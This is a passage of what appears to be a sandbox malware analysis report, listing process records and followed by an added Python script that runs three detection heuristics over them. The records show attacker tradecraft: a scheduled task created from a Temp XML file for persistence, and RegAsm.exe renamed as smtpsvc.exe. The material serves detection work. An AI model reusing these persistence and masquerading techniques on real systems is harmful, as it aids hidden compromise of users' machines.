                                                                                Imagebase:0x400000
                                                                                File size:131072 bytes
                                                                                MD5 hash:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Visual Basic
                                                                                Antivirus matches:
                                                                                • Detection: 28%, ReversingLabs
                                                                                Reputation:low

                                                                                General

                                                                                Start time:07:30:45
                                                                                Start date:25/02/2021
                                                                                Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
                                                                                Imagebase:0x1240000
                                                                                File size:53248 bytes
                                                                                MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:moderate
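The process entries above contain three observations a detection engineer would want to turn into rules: schtasks.exe creating a task from an XML file in the user's Temp directory, smtpsvc.exe under Program Files (x86) carrying exactly the same MD5 (246BB0F8D68A463FD17C235DEB5491C0) as the legitimate RegAsm.exe in the .NET framework directory, and filename1.exe executing from an arbitrary folder directly under the user profile. The following script is an added example and is not part of the Joe Sandbox report; it re-encodes the listed process records as dictionaries (path, command line, MD5 copied from the report) and runs those three heuristics over them. The rule names, the set of "well-known" profile subfolders and the record layout are the example's own assumptions, not anything the report defines.

```python
"""Three detection heuristics run over the process records listed in the report.

Added example; not code from the sandbox report. The process records below are
transcribed from the report's process list (path, command line, MD5 hash).
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (rule name, offending path)

# Process records transcribed from the report above.
PROCESSES: List[Dict[str, str]] = [
    {"path": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r"'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'",
     "md5": "2003E9B15E1C502B146DAD2E383AC1E3"},
    {"path": r"C:\Windows\System32\taskeng.exe",
     "cmd": r"taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]",
     "md5": "65EA57712340C09B1B0C427B4848AE05"},
    {"path": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe",
     "cmd": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0",
     "md5": "246BB0F8D68A463FD17C235DEB5491C0"},
    {"path": r"C:\Program Files (x86)\SMTP Service\smtpsvc.exe",
     "cmd": r"'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0",
     "md5": "246BB0F8D68A463FD17C235DEB5491C0"},
    {"path": r"C:\Users\user\subfolder1\filename1.exe",
     "cmd": r"'C:\Users\user\subfolder1\filename1.exe'",
     "md5": "A6AD1C3046A3CF0C6992507F2886AAB3"},
    {"path": r"C:\Program Files (x86)\SMTP Service\smtpsvc.exe",
     "cmd": r"'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'",
     "md5": "246BB0F8D68A463FD17C235DEB5491C0"},
]

# Assumed patterns for this example (not taken from the report).
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
XML_ARG_RE = re.compile(r"/xml\s+(?:'([^']*)'|(\S+))", re.IGNORECASE)
PROFILE_RE = re.compile(r"^c:\\users\\[^\\]+\\(?:([^\\]+)\\)?", re.IGNORECASE)
KNOWN_PROFILE_DIRS = {"appdata", "desktop", "documents", "downloads"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def scheduled_task_from_temp(procs: List[Dict[str, str]]) -> List[Finding]:
    """schtasks.exe /create whose task definition XML sits in the user Temp directory."""
    hits: List[Finding] = []
    for p in procs:
        if basename(p["path"]) != "schtasks.exe":
            continue
        if not re.search(r"/create\b", p["cmd"], re.IGNORECASE):
            continue
        m = XML_ARG_RE.search(p["cmd"])
        if m:
            xml_path = m.group(1) or m.group(2)
            if TEMP_DIR_RE.search(xml_path):
                hits.append(("scheduled_task_from_temp", xml_path))
    return hits


def renamed_system_binary(procs: List[Dict[str, str]]) -> List[Finding]:
    """One MD5 seen under C:\\Windows and, under a different file name, outside it."""
    by_md5 = defaultdict(set)
    for p in procs:
        by_md5[p["md5"].upper()].add(p["path"])
    hits: List[Finding] = []
    for paths in by_md5.values():
        in_windows = {x for x in paths if x.lower().startswith("c:\\windows\\")}
        system_names = {basename(x) for x in in_windows}
        if not system_names:
            continue
        for x in sorted(paths - in_windows):
            if basename(x) not in system_names:
                hits.append(("renamed_system_binary", x))
    return hits


def executable_in_profile_root(procs: List[Dict[str, str]]) -> List[Finding]:
    """Image executed from the profile root or a non-standard profile subfolder."""
    hits: List[Finding] = []
    seen = set()
    for p in procs:
        m = PROFILE_RE.match(p["path"])
        if not m or p["path"] in seen:
            continue
        first_subdir = (m.group(1) or "").lower()
        if first_subdir in KNOWN_PROFILE_DIRS:
            continue
        seen.add(p["path"])
        hits.append(("executable_in_profile_root", p["path"]))
    return hits


def run_all(procs: List[Dict[str, str]]) -> List[Finding]:
    """Run every heuristic and concatenate the findings in rule order."""
    return (scheduled_task_from_temp(procs)
            + renamed_system_binary(procs)
            + executable_in_profile_root(procs))


if __name__ == "__main__":
    for rule, target in run_all(PROCESSES):
        print(f"{rule}: {target}")
```

On this record set the script reports the Temp-based task XML, smtpsvc.exe as a renamed copy of RegAsm.exe, and filename1.exe under the profile root. The hash-match rule only fires when both copies of the binary were observed in the same data set; in a fleet-wide hunt you would instead compare observed hashes against a catalogue of known Microsoft binaries. The Temp-XML rule will also match some legitimate installers, so it is a candidate for correlation with the parent process (here the Equation Editor chain from the head of the report) rather than a stand-alone alert.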

                                                                                Disassembly

                                                                                Code Analysis